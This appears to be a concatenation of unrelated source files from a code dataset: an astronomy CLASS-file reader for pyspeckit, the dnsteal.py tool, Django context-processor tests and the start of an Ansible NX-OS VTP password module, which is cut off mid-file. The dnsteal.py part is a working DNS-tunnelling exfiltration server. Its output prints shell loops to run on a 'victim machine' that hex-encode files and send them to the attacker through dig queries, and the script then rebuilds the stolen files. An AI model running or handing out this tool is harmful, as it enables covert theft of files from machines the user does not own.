                     .format(t1-t0, t2-t1, t3-t2, len(self.allind)))

    def __repr__(self):
        # One "key: value" line per getinfo() entry, below a summary line.
        s = "\n".join(["{k}: {v}".format(k=k,v=v)
                       for k,v in iteritems(self.getinfo())])
        return "ClassObject({id}) with {nspec} entries\n".format(id=id(self),
                                                                 nspec=len(self.allind)) + s

    def getinfo(self, allsources=False):
        """Summarize the file: telescopes, lines, scans and source names.

        With ``allsources=False`` calibration-like sources (SKY-, TSYS, ...)
        are excluded via ``sci_sources``.
        """
        info = dict(
            tels = self.tels,
            lines = self.lines,
            scans = self.scans,
            sources = self.sources if allsources else self.sci_sources,
        )
        return info

    def set_posang(self):
        """Attach COMPPOSA (degrees) to every index entry: the position angle
        from the previous entry's offsets to this entry's offsets."""
        h0 = self.headers[0]
        for h in self.headers:
            dx = h['OFF1'] - h0['OFF1']
            dy = h['OFF2'] - h0['OFF2']
            h['COMPPOSA'] = np.arctan2(dy,dx)*180/np.pi
            h0 = h

    def _identify_otf_scans(self, verbose=False):
        """Group consecutive entries sharing SCAN+SOURC into OTF scans.

        Each entry gets an OTFSCAN counter; when a scan boundary is crossed,
        the finished group also gets a common SCANPOSA (the median COMPPOSA,
        mod 180) and its first entry is tagged with FIRSTSCAN.
        """
        h0 = self.allind[0]
        st = 0
        otfscan = 0
        posangs = [h['COMPPOSA'] for h in self.allind]
        if verbose:
            pb = ProgressBar(len(self.allind))
        for ii,h in enumerate(self.allind):
            if (h['SCAN'] != h0['SCAN']
                or h['SOURC'] != h0['SOURC']):
                # Scan boundary: finalize the group [st, ii)
                h0['FIRSTSCAN'] = st
                cpa = np.median(posangs[st:ii])
                for hh in self.allind[st:ii]:
                    hh['SCANPOSA'] = cpa % 180
                st = ii
                if h['SCAN'] == h0['SCAN']:
                    h0['OTFSCAN'] = otfscan
                    otfscan += 1
                    h['OTFSCAN'] = otfscan
                else:
                    otfscan = 0
                    h['OTFSCAN'] = otfscan
            else:
                h['OTFSCAN'] = otfscan
            if verbose:
                pb.update(ii)

    def listscans(self, source=None, telescope=None, out=sys.stdout):
        """Print a per-scan summary table (offset extents, angles, OTF scan
        numbers) to *out*, optionally filtered by source/telescope regex."""
        minid=0
        scan = -1
        sourc = ""
        #tel = ''
        minoff1,maxoff1 = np.inf,-np.inf
        minoff2,maxoff2 = np.inf,-np.inf
        ttlangle,nangle = 0.0,0
        print("{entries:15s} {SOURC:12s} {XTEL:12s} {SCAN:>8s} {SUBSCAN:>8s} "
              "[ {RAmin:>12s}, {RAmax:>12s} ] "
              "[ {DECmin:>12s}, {DECmax:>12s} ] "
              "{angle:>12s} {SCANPOSA:>12s} {OTFSCAN:>8s} {TSYS:>8s} {UTD:>12s}"
              .format(entries='Scans', SOURC='Source', XTEL='Telescope',
                      SCAN='Scan', SUBSCAN='Subscan',
                      RAmin='min(RA)', RAmax='max(RA)',
                      DECmin='min(DEC)', DECmax='max(DEC)',
                      SCANPOSA='Scan PA',
                      angle='Angle', OTFSCAN='OTFscan',
                      TSYS='TSYS', UTD='UTD'),
              file=out)
        data_rows = []
        for ii,row in enumerate(self.headers):
            if (row['SCAN'] == scan
                and row['SOURC'] == sourc
                #and row['XTEL'] == tel
               ):
                # Same scan: accumulate offset extents and step angles.
                minoff1 = min(minoff1, row['OFF1'])
                maxoff1 = max(maxoff1, row['OFF1'])
                minoff2 = min(minoff2, row['OFF2'])
                maxoff2 = max(maxoff2, row['OFF2'])
                ttlangle += np.arctan2(row['OFF2'] - prevrow['OFF2'],
                                       row['OFF1'] - prevrow['OFF1'])%np.pi
                nangle += 1
                prevrow = row
            else:
                if scan == -1:
                    # First row ever seen: just initialize the trackers.
                    scan = row['SCAN']
                    sourc = row['SOURC']
                    #tel = row['XTEL']
                    prevrow = row
                    continue
                # Scan changed: decide whether the finished scan matches the
                # source/telescope filters, then print+record it.
                ok = True
                if source is not None:
                    if isinstance(source, (list,tuple)):
                        ok = ok and any(re.search((s), prevrow['SOURC'])
                                        for s in source)
                    else:
                        ok = ok and re.search((source), prevrow['SOURC'])
                if telescope is not None:
                    ok = ok and re.search((telescope), prevrow['XTEL'])
                if ok:
                    # Offsets are in radians; report arcseconds.
                    data = dict(RAmin=minoff1*180/np.pi*3600,
                                RAmax=maxoff1*180/np.pi*3600,
                                DECmin=minoff2*180/np.pi*3600,
                                DECmax=maxoff2*180/np.pi*3600,
                                angle=(ttlangle/nangle)*180/np.pi if nangle>0 else 0,
                                e0=minid,
                                e1=ii-1,
                                #TSYS=row['TSYS'] if 'TSYS' in row else '--',
                                UTD=row['DOBS']+row['UT'] if 'UT' in row else -99,
                                **prevrow)
                    print("{e0:7d}-{e1:7d} {SOURC:12s} {XTEL:12s} {SCAN:8d} {SUBSCAN:8d} "
                          "[ {RAmin:12f}, {RAmax:12f} ] "
                          "[ {DECmin:12f}, {DECmax:12f} ] "
                          "{angle:12.1f} {SCANPOSA:12.1f} {OTFSCAN:8d}"
                          " {TSYS:>8.1f} {UTD:12f}".
                          format(**data),
                          file=out)
                    data_rows.append(data)
                # Reset the accumulators for the next scan.
                minoff1,maxoff1 = np.inf,-np.inf
                minoff2,maxoff2 = np.inf,-np.inf
                ttlangle,nangle = 0.0,0
                scan = row['SCAN']
                sourc = row['SOURC']
                #tel = row['XTEL']
                minid = ii
        # NOTE(review): only the *last* scan's summary dict is returned;
        # data_rows is accumulated but never returned -- confirm intent.
        return data

    @property
    def tels(self):
        # Cached set of telescope names (XTEL) present in the index.
        if hasattr(self,'_tels'):
            return self._tels
        else:
            self._tels = set([h['XTEL'] for h in self.allind])
            return self._tels

    @property
    def sources(self):
        # Cached set of all source names (SOURC) present in the index.
        if hasattr(self,'_source'):
            return self._source
        else:
            self._source = set([h['SOURC'] for h in self.allind])
            return self._source

    @property
    def scans(self):
        # Cached set of scan numbers present in the index.
        if hasattr(self,'_scan'):
            return self._scan
        else:
            self._scan = set([h['SCAN'] for h in self.allind])
            return self._scan

    @property
    def sci_sources(self):
        # Sources excluding calibration/housekeeping entries.
        return set([s for s in self.sources
                    if s[:4] not in ('SKY-', 'TSYS', 'TCAL', 'TREC', 'HOT-',
                                     'COLD')])

    @property
    def lines(self):
        # Cached set of line names (LINE) present in the index.
        if hasattr(self,'_lines'):
            return self._lines
        else:
            self._lines = set([h['LINE'] for h in self.allind])
            return self._lines

    def _load_all_spectra(self, indices=None):
        """Force-load all (or the given) spectra into the lazy cache."""
        if indices is None:
            indices = range(self.file_description['xnext']-1)

        if hasattr(self, '_loaded_indices'):
            indices_set = set(indices)
            indices_to_load = (indices_set.difference(self._loaded_indices))
            self._loaded_indices = self._loaded_indices.union(indices_set)

            if any(indices_to_load):
                pb = ProgressBar(len(indices_to_load))
                # NOTE(review): xrange over a *set* raises TypeError; this was
                # probably meant to iterate indices_to_load directly -- confirm.
                for ii,k in enumerate(xrange(indices_to_load)):
                    self._spectra[k]
                    pb.update(ii)
        else:
            self._loaded_indices = set(indices)
            self._spectra.load_all()

    @property
    def spectra(self):
        # Data arrays of the loaded spectra (element 0 of each cached pair).
        return [x[0] for x in self._spectra]

    @property
    def headers(self):
        # Loaded headers where available, otherwise the raw index entries.
        return [self._spectra[ii][1]
                if ii in self._spectra else x
                for ii,x in enumerate(self.allind)]

    def select_spectra(self,
                       all=None,
                       line=None,
                       linere=None,
                       linereflags=re.IGNORECASE,
                       number=None,
                       scan=None,
                       offset=None,
                       source=None,
                       sourcere=None,
                       sourcereflags=re.IGNORECASE,
                       range=None,
                       quality=None,
                       telescope=None,
                       telescopere=None,
                       telescopereflags=re.IGNORECASE,
                       subscan=None,
                       entry=None,
                       posang=None,
                       #observed=None,
                       #reduced=None,
                       frequency=None,
                       section=None,
                       user=None,
                       include_old_versions=False,
                       ):
        """
        Return the indices of entries matching *all* of the given criteria
        (each criterion is skipped when its argument is None).

        Parameters
        ----------
        include_old_versions: bool
            Include spectra with XVER numbers <0? These are CLASS spectra that
            have been "overwritten" (re-reduced?)
        """
        # An explicit (start, stop) entry range short-circuits all filtering.
        if entry is not None and len(entry)==2:
            return irange(entry[0], entry[1])

        if frequency is not None:
            # RESTF only exists on fully-loaded headers.
            self._load_all_spectra()

        sel = [(re.search(re.escape(line), h['LINE'], re.IGNORECASE)
                if line is not None else True) and
               (re.search(linere, h['LINE'], linereflags)
                if linere is not None else True) and
               (h['SCAN'] == scan if scan is not None else True) and
               ((h['OFF1'] == offset or
                 h['OFF2'] == offset) if offset is not None else True) and
               (re.search(re.escape(source), h['CSOUR'], re.IGNORECASE)
                if source is not None else True) and
               (re.search(sourcere, h['CSOUR'], sourcereflags)
                if sourcere is not None else True) and
               (h['OFF1']>range[0] and h['OFF1'] < range[1] and
                h['OFF2']>range[2] and h['OFF2'] < range[3]
                if range is not None and len(range)==4 else True) and
               (h['QUAL'] == quality if quality is not None else True) and
               (re.search(re.escape(telescope), h['CTELE'], re.IGNORECASE)
                if telescope is not None else True) and
               (re.search(telescopere, h['CTELE'], telescopereflags)
                if telescopere is not None else True) and
               (h['SUBSCAN']==subscan if subscan is not None else True) and
               (h['NUM'] >= number[0] and h['NUM'] < number[1]
                if number is not None else True) and
               ('RESTF' in h and # Need to check that it IS a spectrum: continuum data can't be accessed this way
                h['RESTF'] > frequency[0] and
                h['RESTF'] < frequency[1]
                if frequency is not None and len(frequency)==2
                else True) and
               (h['COMPPOSA']%180 > posang[0] and
                h['COMPPOSA']%180 < posang[1]
                if posang is not None and len(posang)==2
                else True) and
               (h['XVER'] > 0 if not include_old_versions else True)
               for h in self.headers
               ]

        return [ii for ii,k in enumerate(sel) if k]

    def get_spectra(self, progressbar=True, **kwargs):
        """Select spectra (see ``select_spectra``), load them, and return the
        (spectrum, header) pairs.  Raises ValueError on an empty selection."""
        selected_indices = self.select_spectra(**kwargs)
        if not any(selected_indices):
            raise ValueError("Selection yielded empty.")
        self._spectra.load(selected_indices, progressbar=progressbar)
        return [self._spectra[ii] for ii in selected_indices]

    def get_pyspeckit_spectra(self, progressbar=True, **kwargs):
        """Like ``get_spectra`` but wrap each result in a pyspeckit.Spectrum
        with a proper spectroscopic axis and a cleaned header."""
        spdata = self.get_spectra(progressbar=progressbar, **kwargs)

        spectra = [pyspeckit.Spectrum(data=data,
                                      xarr=make_axis(header),
                                      header=clean_header(header))
                   for data,header in spdata]

        return spectra

    def read_observations(self, observation_indices, progressbar=True):
        """Load and return the (spectrum, header) pairs at the given indices."""
        self._spectra.load(observation_indices, progressbar=progressbar)
        return [self._spectra[ii] for ii in observation_indices]
@print_timing
def read_class(filename, downsample_factor=None, sourcename=None,
               telescope=None, posang=None, verbose=False,
               flag_array=None):
    """
    Read a binary class file.
    Based on the
    `GILDAS CLASS file type Specification
    <http://iram.fr/IRAMFR/GILDAS/doc/html/class-html/node58.html>`_

    Parameters
    ----------
    filename: str
    downsample_factor: None or int
        Factor by which to downsample data by averaging.  Useful for
        overresolved data.
    sourcename: str or list of str
        Source names to match to the data (uses regex)
    telescope: str or list of str
        'XTEL' or 'TELE' parameters: the telescope & instrument
    posang: 2-tuple, optional
        Position-angle range forwarded to ``select_spectra``.
    verbose: bool
        Log progress messages.
    flag_array: np.ndarray
        An array with the same shape as the data used to flag out
        (remove) data when downsampling. True = flag out

    Returns
    -------
    (spectra, headers, indexes) tuple, or None when nothing matched.
    """
    classobj = ClassObject(filename)

    # Normalize scalar selections to lists so the double loop below works.
    if not isinstance(sourcename, (list,tuple)):
        sourcename = [sourcename]
    if not isinstance(telescope, (list,tuple)):
        telescope = [telescope]

    spectra,headers = [],[]

    if verbose:
        log.info("Reading...")

    # Union of the matches over every (source, telescope) combination.
    selection = [ii
                 for source in sourcename
                 for tel in telescope
                 for ii in classobj.select_spectra(sourcere=source,
                                                   telescope=tel,
                                                   posang=posang)]

    sphdr = classobj.read_observations(selection)
    if len(sphdr) == 0:
        return None
    spec,hdr = zip(*sphdr)
    spectra += spec
    headers += hdr

    # NOTE(review): 'indexes' aliases the pre-downsampling header list; the
    # downsampling below rebinds 'headers' to a new list, but since
    # downsample_header mutates the dicts in place both names end up seeing
    # the updated values -- confirm this aliasing is intentional.
    indexes = headers

    # Flagged-out samples get zero weight in the downsampling average.
    weight = ~flag_array if flag_array is not None else None

    if downsample_factor is not None:
        if verbose:
            log.info("Downsampling...")
        spectra = [downsample_1d(spec, downsample_factor,
                                 weight=weight)
                   for spec in ProgressBar(spectra)]
        headers = [downsample_header(h, downsample_factor)
                   for h in ProgressBar(headers)]

    return spectra,headers,indexes
def downsample_header(hdr, downsample_factor):
    """
    Update *hdr* in place to reflect downsampling by *downsample_factor*:
    channel/point/data counts shrink, frequency/velocity resolutions grow,
    and the reference channel is remapped.  Returns the same dict.
    """
    for k in ('NCHAN', 'NPOIN', 'DATALEN'):
        if k in hdr:
            # Channel/byte counts stay integral (bugfix: true division
            # produced floats under py3 semantics).
            hdr[k] = hdr[k] // downsample_factor
    # maybe wrong? h['RCHAN'] = (h['RCHAN']-1) / downsample_factor + 1
    scalefactor = 1. / downsample_factor
    hdr['RCHAN'] = (hdr['RCHAN'] - 1) * scalefactor + 0.5 + scalefactor / 2.
    for kw in ('FRES', 'VRES'):
        if kw in hdr:
            hdr[kw] *= downsample_factor
    return hdr
def make_axis(header, imagfreq=False):
    """
    Create a :class:`pyspeckit.spectrum.units.SpectroscopicAxis` (in MHz)
    from the CLASS "header".  With ``imagfreq=True`` the axis is built around
    the image frequency instead of the rest frequency.
    """
    from .. import units
    restfreq = header.get('RESTF')
    xunits = 'MHz'
    nchan = header.get('NCHAN')
    voff = header.get('VOFF')
    foff = header.get('FOFF')
    doppler = header.get('DOPPLER')
    fres = header.get('FRES')
    refchan = header.get('RCHAN')
    imfreq = header.get('IMAGE')

    if foff in (None, 0.0) and voff not in (None, 0.0):
        # Radio convention
        foff = -voff / 2.997924580e5 * restfreq

    # Frequency offset of each 1-based channel from the reference channel.
    chanoff = (numpy.arange(1, nchan + 1) - refchan) * fres
    if imagfreq:
        return units.SpectroscopicAxis(imfreq - chanoff, unit='MHz',
                                       refX=imfreq * u.MHz)
    return units.SpectroscopicAxis(restfreq + foff + chanoff, unit='MHz',
                                   refX=restfreq * u.MHz)
@print_timing
def class_to_obsblocks(filename, telescope, line, datatuple=None, source=None,
                       imagfreq=False, DEBUG=False, **kwargs):
    """
    Load an entire CLASS observing session into a list of ObsBlocks based on
    matches to the 'telescope', 'line' and 'source' names

    Parameters
    ----------
    filename : string
        The Gildas CLASS data file to read the spectra from.
    telescope : list
        List of telescope names to be matched.
    line : list
        List of line names to be matched.
    source : list (optional)
        List of source names to be matched. Defaults to None.
    imagfreq : bool
        Create a SpectroscopicAxis with the image frequency.
    DEBUG : bool
        Unused; retained for backward compatibility.
    """
    if datatuple is None:
        # Bugfix: read_class() has no DEBUG parameter; forwarding it raised
        # TypeError whenever datatuple was not supplied.
        spectra, header, indexes = read_class(filename, **kwargs)
    else:
        spectra, header, indexes = datatuple

    obslist = []
    lastscannum = -1
    spectrumlist = None
    for sp, hdr, ind in zip(spectra, header, indexes):
        hdr.update(ind)
        # this is slow but necessary...
        H = pyfits.Header()
        for k, v in iteritems(hdr):
            if hasattr(v, "__len__") and not isinstance(v, str):
                # Sequences: expand into numbered keys, or unwrap singletons.
                if len(v) > 1:
                    for ii, vv in enumerate(v):
                        H.update(k[:7] + str(ii), vv)
                else:
                    H.update(k, v[0])
            elif pyfits.Card._comment_FSC_RE.match(str(v)) is not None:
                # NOTE(review): Header.update(key, value) is the legacy pyfits
                # API; modern astropy.io.fits uses item assignment -- confirm
                # the pinned pyfits version before changing.
                H.update(k, v)
        scannum = hdr['SCAN']
        # Apply the telescope/line/source filters.
        if 'XTEL' in hdr and hdr['XTEL'].strip() not in telescope:
            continue
        if hdr['LINE'].strip() not in line:
            continue
        if (source is not None) and (hdr['SOURC'].strip() not in source):
            continue
        hdr.update({'RESTFREQ': hdr.get('RESTF')})
        H.update('RESTFREQ', hdr.get('RESTF'))
        #print "Did not skip %s,%s. Scannum, last: %i,%i" % (hdr['XTEL'],hdr['LINE'],scannum,lastscannum)
        if scannum != lastscannum:
            # New scan: flush the previous one into an ObsBlock and start over.
            lastscannum = scannum
            if spectrumlist is not None:
                obslist.append(pyspeckit.ObsBlock(spectrumlist))
            xarr = make_axis(hdr, imagfreq=imagfreq)
            spectrumlist = [(
                pyspeckit.Spectrum(xarr=xarr,
                                   header=H,
                                   data=sp))]
        else:
            spectrumlist.append(
                pyspeckit.Spectrum(xarr=xarr,
                                   header=H,
                                   data=sp))
    # Bugfix: flush the final scan -- previously the last spectrumlist was
    # silently dropped from the returned list.
    if spectrumlist is not None:
        obslist.append(pyspeckit.ObsBlock(spectrumlist))
    return obslist
class LazyItem(object):
    """
    Simple lazy spectrum-retriever wrapper.

    Maps an observation index to a cached ``(spectrum, header)`` pair, reading
    it from the parent ``ClassObject``'s file on first access.
    """
    def __init__(self, parent):
        self.parent = parent
        self.sphdr = {}          # cache: index -> (spectrum, header)
        self.nind = len(self.parent.allind)
        self.nloaded = 0

    def __repr__(self):
        return ("Set of {0} spectra & headers, {1} loaded"
                " ({2:0.2f}%)".format(self.nind, self.nloaded,
                                      (float(self.nloaded)/self.nind)*100))

    def load_all(self, progressbar=True):
        """Load every spectrum in the file."""
        # Bugfix: forward the progressbar flag (it was silently dropped).
        self.load(range(self.nind), progressbar=progressbar)

    def load(self, indices, progressbar=True):
        """Load (and cache) the spectra at the given indices."""
        pb = ProgressBar(len(indices))
        counter = 0
        for k in indices:
            self[k]
            counter += 1
            pb.update(counter)

    def __getitem__(self, key):
        # Handle slices before the cache lookup.  Bugfixes: slice objects are
        # not hashable on older Pythons (so 'key in dict' could raise), and
        # the stop attribute is slice.stop, not slice.end.
        if isinstance(key, slice):
            return [self[k] for k in range(key.start or 0,
                                           key.stop or len(self.parent.allind),
                                           key.step or 1)]
        if key in self.sphdr:
            return self.sphdr[key]
        sphd = read_observation(self.parent._file, key,
                                file_description=self.parent.file_description,
                                indices=self.parent.allind,
                                my_memmap=self.parent._data)
        # Update the header with OTFSCAN and POSANG info
        sphd[1].update(self.parent.allind[key])
        self.sphdr[key] = sphd
        self.nloaded += 1
        return sphd

    def __iter__(self):
        # Iterate over the loaded (spectrum, header) pairs.
        # Bugfix: this used to return self.next() -- a py2-only method whose
        # body also referenced a nonexistent 'spheader' attribute.
        return iter(self.sphdr.values())

    def __contains__(self, key):
        return key in self.sphdr
@print_timing
def class_to_spectra(filename, datatuple=None, **kwargs):
    """
    Load each individual spectrum within a CLASS file into a list of Spectrum
    objects
    """
    if datatuple is None:
        spectra, header, indexes = read_class(filename, **kwargs)
    else:
        spectra, header, indexes = datatuple

    speclist = []
    for data, hdr, ind in zip(spectra, header, indexes):
        # Fold the index entry into the header before building the axis.
        hdr.update(ind)
        speclist.append(pyspeckit.Spectrum(xarr=make_axis(hdr),
                                           header=hdr,
                                           data=data))

    return pyspeckit.Spectra(speclist)
def tests():
    """
    Tests are specific to the machine on which this code was developed.
    """
    fn1 = '/Users/adam/work/bolocam/hht/class_003.smt'
    # Alternative local test files:
    #fn1 = '/Users/adam/work/bolocam/hht/class_001.smt'
    #fn1 = '/Users/adam/work/bolocam/hht/test_SMT-F1M-VU-20824-073.cls'
    #fn2 = '/Users/adam/work/bolocam/hht/test_SMT-F1M-VU-79472+203.cls'
    #F1 = read_class(fn1)#,DEBUG=True)
    #F2 = read_class(fn2)
    n2hp = class_to_obsblocks(fn1,
                              telescope=['SMT-F1M-HU', 'SMT-F1M-VU'],
                              line=['N2HP(3-2)', 'N2H+(3-2)'])
    hcop = class_to_obsblocks(fn1,
                              telescope=['SMT-F1M-HL', 'SMT-F1M-VL'],
                              line=['HCOP(3-2)', 'HCO+(3-2)'])
| mit |
geminas/dnsteal | dnsteal.py | 12 | 3710 | #!/usr/bin/env python
# ~ \x90
######################
import socket
import sys
import binascii
import time
import random
import hashlib
import zlib
# ANSI color escape codes used throughout the console output:
# r = bright red, g = bright green, y = bright yellow, e = end/reset.
c = { "r" : "\033[1;31m", "g": "\033[1;32m", "y" : "\033[1;33m", "e" : "\033[0m" }
VERSION = "1.0"
class DNSQuery:
    """Minimal DNS query parser/responder operating on raw packet strings."""

    def __init__(self, data):
        """Parse *data*; for a standard query, collect the dot-joined QNAME
        labels into ``self.data_text`` (each label followed by a '.')."""
        self.data = data
        self.data_text = ''

        opcode = (ord(data[2]) >> 3) & 15  # opcode bits of the DNS header
        if opcode == 0:  # standard query: walk the length-prefixed labels
            offset = 12  # QNAME starts right after the 12-byte header
            length = ord(data[offset])
            while length != 0:
                self.data_text += data[offset + 1:offset + length + 1] + '.'
                offset += length + 1
                length = ord(data[offset])

    def request(self, ip):
        """Build a DNS response answering the parsed query with an A record
        pointing at *ip*; returns '' when no query name was parsed."""
        packet = ''
        if self.data_text:
            packet += self.data[:2] + "\x81\x80"          # ID + response flags
            packet += self.data[4:6] * 2 + '\x00\x00\x00\x00'  # QD/AN counts, NS/AR zero
            packet += self.data[12:]                      # original question
            packet += '\xc0\x0c'                          # pointer to the name
            packet += '\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04'  # A/IN, TTL 60, rdlength 4
            packet += ''.join(chr(int(octet)) for octet in ip.split('.'))
        return packet
def save_to_file(r_data, z):
    # Reassemble and write every exfiltrated file to disk.
    # r_data maps filename -> list of hex-string chunks (in arrival order);
    # z indicates the sender gzip-compressed the data before hex-encoding.
    print "\n"
    for key,value in r_data.iteritems():
        # [sic] 'recieved' typo kept: it is the on-disk output filename.
        fname = "recieved_%s" % key
        # Concatenate the hex chunks back into one string.
        flatdata = ""
        for block in value:
            flatdata += block
        if (z):
            print "%s[ Info ]%s Unzipping data." % (c["y"], c["e"])
            # 16+MAX_WBITS tells zlib to expect a gzip header/trailer.
            x = zlib.decompressobj(16+zlib.MAX_WBITS)
            flatdata = x.decompress(binascii.unhexlify(flatdata))
        print "%s[ Info ]%s Saving recieved bytes to './%s'" % (c["y"], c["e"], fname)
        f = open(fname, "wb")
        if (z):
            # Already decompressed to raw bytes above.
            f.write(flatdata)
        else:
            # Still hex-encoded: decode before writing.
            f.write(binascii.unhexlify(flatdata))
        f.close()
        # Report the md5 so the sender can verify integrity.
        print "%s[md5sum]%s '%s'" % (c["g"], c["e"], hashlib.md5(open(fname, "r").read()).hexdigest())
def banner():
    # Print the ANSI-colored ASCII-art banner; the trailing comma on the
    # first print keeps the color code on the same line as the art.
    print "\033[1;31m",
    print """
      ___  _  _ ___ _            _
     |   \| \| / __| |_ ___ __ _| |
     | |) | .` \__ \  _/ -_) _` | |
     |___/|_|\_|___/\__\___\__,_|_|v%s

-- https://github.com/m57/dnsteal.git --\033[0m

Stealthy file extraction via DNS requests
""" % VERSION
if __name__ == '__main__':

    # --- argument handling -------------------------------------------------
    z = False  # -z flag: gunzip incoming data before saving
    try:
        ip = sys.argv[1]
        if "-z" in sys.argv:
            z = True
    except:
        # Missing listen address: show usage and bail out.
        banner()
        print "Usage: python %s [listen_address] [-z (optional: unzip incoming data)]" % sys.argv[0]
        exit(1)

    banner()

    # --- bind a fake DNS server on UDP/53 (requires root) ------------------
    udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udp.bind((ip,53))

    print "%s[+]%s DNS listening on '%s:53'" % (c["g"], c["e"], ip)
    print "%s[+]%s Now on the victim machine, use any of the following commands (or similar):" % (c["y"], c["e"])
    print "\t%s[\x23]%s for b in $(xxd -p /path/to/file); do dig +short @%s $b.filename.com; done" % (c["r"], c["e"], ip )
    print "\t%s[\x23]%s for b in $(gzip -c /path/to/file | xxd -p); do dig +short @%s $b.filename.com; done\n" % (c["r"], c["e"], ip)
    print "\t%s[\x23]%s for f in $(ls *); do for b in $(xxd -p $f); do dig +short @%s $b.$f.com; done; done" % (c["r"], c["e"], ip)
    print "\t%s[\x23]%s for f in $(ls *); do for b in $(gzip -c $f | xxd -p); do dig +short @%s $b.$f.com; done; done\n" % (c["r"], c["e"], ip)
    print "%s[+]%s Once files have sent, use Ctrl+C to exit and save.\n" % (c["g"], c["e"])

    # NOTE(review): file_seed is generated but never used -- confirm intent.
    file_seed = random.randint(1,32768)

    try:
        # Collected payloads: filename -> list of hex chunks.
        r_data = {}
        while 1:
            # Answer every query with our own IP and record the hex payload.
            data, addr = udp.recvfrom(1024)
            p=DNSQuery(data)
            udp.sendto(p.request(ip), addr)
            print 'Request: %s -> %s' % (p.data_text, ip)
            # Query format: <hexchunk>.<filename>.<tld>; label 0 is the
            # payload, label 1 identifies the destination file.
            fname = p.data_text.split(".")[1]
            if fname not in r_data:
                r_data[fname] = []
            r_data[fname].append(p.data_text.split(".")[0])

    except KeyboardInterrupt:
        # Ctrl+C: flush everything collected so far to disk and shut down.
        save_to_file(r_data, z)
        print '\n\033[1;31m[!]\033[0m Closing...'
        udp.close()
| gpl-2.0 |
aparo/django-nonrel | tests/regressiontests/context_processors/tests.py | 50 | 4683 | """
Tests for Django's bundled context processors.
"""
from django.conf import settings
from django.contrib.auth import authenticate
from django.db.models import Q
from django.test import TestCase
from django.template import Template
class RequestContextProcessorTests(TestCase):
    """
    Tests for the ``django.core.context_processors.request`` processor.
    """
    urls = 'regressiontests.context_processors.urls'

    def test_request_attributes(self):
        """
        Test that the request object is available in the template and that its
        attributes can't be overridden by GET and POST parameters (#3828).
        """
        url = '/request_attrs/'
        # The request object itself must be exposed to the template.
        self.assertContains(self.client.get(url), 'Have request')
        # is_secure must not be overridable from request parameters.
        self.assertContains(self.client.get(url), 'Not secure')
        self.assertContains(self.client.get(url, {'is_secure': 'blah'}),
                            'Not secure')
        self.assertContains(self.client.post(url, {'is_secure': 'blah'}),
                            'Not secure')
        # Neither must path.
        self.assertContains(self.client.get(url), url)
        self.assertContains(self.client.get(url, {'path': '/blah/'}), url)
        self.assertContains(self.client.post(url, {'path': '/blah/'}), url)
class AuthContextProcessorTests(TestCase):
    """
    Tests for the ``django.contrib.auth.context_processors.auth`` processor
    """
    urls = 'regressiontests.context_processors.urls'
    fixtures = ['context-processors-users.xml']
    def test_session_not_accessed(self):
        """
        Tests that the session is not accessed simply by including
        the auth context processor
        """
        response = self.client.get('/auth_processor_no_attr_access/')
        self.assertContains(response, "Session not accessed")
    def test_session_is_accessed(self):
        """
        Tests that the session is accessed if the auth context processor
        is used and relevant attributes accessed.
        """
        response = self.client.get('/auth_processor_attr_access/')
        self.assertContains(response, "Session accessed")
    def test_perms_attrs(self):
        # A superuser should report having permissions via the lazy 'perms'
        # context variable supplied by the processor.
        self.client.login(username='super', password='secret')
        response = self.client.get('/auth_processor_perms/')
        self.assertContains(response, "Has auth permissions")
    def test_message_attrs(self):
        # Messages stored for the user must be reachable from the template.
        self.client.login(username='super', password='secret')
        response = self.client.get('/auth_processor_messages/')
        self.assertContains(response, "Message 1")
    def test_user_attrs(self):
        """
        Test that the lazy objects returned behave just like the wrapped objects.
        """
        # These are 'functional' level tests for common use cases.  Direct
        # testing of the implementation (SimpleLazyObject) is in the 'utils'
        # tests.
        self.client.login(username='super', password='secret')
        user = authenticate(username='super', password='secret')
        response = self.client.get('/auth_processor_user/')
        self.assertContains(response, "unicode: super")
        self.assertContains(response, "id: 100")
        self.assertContains(response, "username: super")
        # bug #12037 is tested by the {% url %} in the template:
        self.assertContains(response, "url: /userpage/super/")
        # See if this object can be used for queries where a Q() comparing
        # a user can be used with another Q() (in an AND or OR fashion).
        # This simulates what a template tag might do with the user from the
        # context. Note that we don't need to execute a query, just build it.
        #
        # The failure case (bug #12049) on Python 2.4 with a LazyObject-wrapped
        # User is a fatal TypeError: "function() takes at least 2 arguments
        # (0 given)" deep inside deepcopy().
        #
        # Python 2.5 and 2.6 succeeded, but logged internally caught exception
        # spew:
        #
        #    Exception RuntimeError: 'maximum recursion depth exceeded while
        #    calling a Python object' in <type 'exceptions.AttributeError'>
        #    ignored"
        query = Q(user=response.context['user']) & Q(someflag=True)
        # Tests for user equality.  This is hard because User defines
        # equality in a non-duck-typing way
        # See bug #12060
        # Both orderings matter: __eq__ must work from either operand.
        self.assertEqual(response.context['user'], user)
        self.assertEqual(user, response.context['user'])
| bsd-3-clause |
willthames/ansible | lib/ansible/modules/network/nxos/nxos_vtp_password.py | 7 | 7866 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: nxos_vtp_password
extends_documentation_fragment: nxos
version_added: "2.2"
short_description: Manages VTP password configuration.
description:
- Manages VTP password configuration.
author:
- Gabriele Gerbino (@GGabriele)
notes:
- VTP feature must be active on the device to use this module.
- This module is used to manage only VTP passwords.
- Use this in combination with M(nxos_vtp_domain) and M(nxos_vtp_version)
to fully manage VTP operations.
- You can set/remove password only if a VTP domain already exist.
- If C(state=absent) and no C(vtp_password) is provided, it remove the current
VTP password.
- If C(state=absent) and C(vtp_password) is provided, the proposed C(vtp_password)
has to match the existing one in order to remove it.
options:
vtp_password:
description:
- VTP password
required: false
default: null
state:
description:
- Manage the state of the resource
required: false
default: present
choices: ['present','absent']
'''
# Usage examples rendered by ansible-doc.  The VTP password option is
# ``vtp_password`` (see argument_spec in main()); the previous examples used
# ``password`` for it, which both named a non-existent module option and
# duplicated the connection ``password`` key in the same YAML mapping.
EXAMPLES = '''
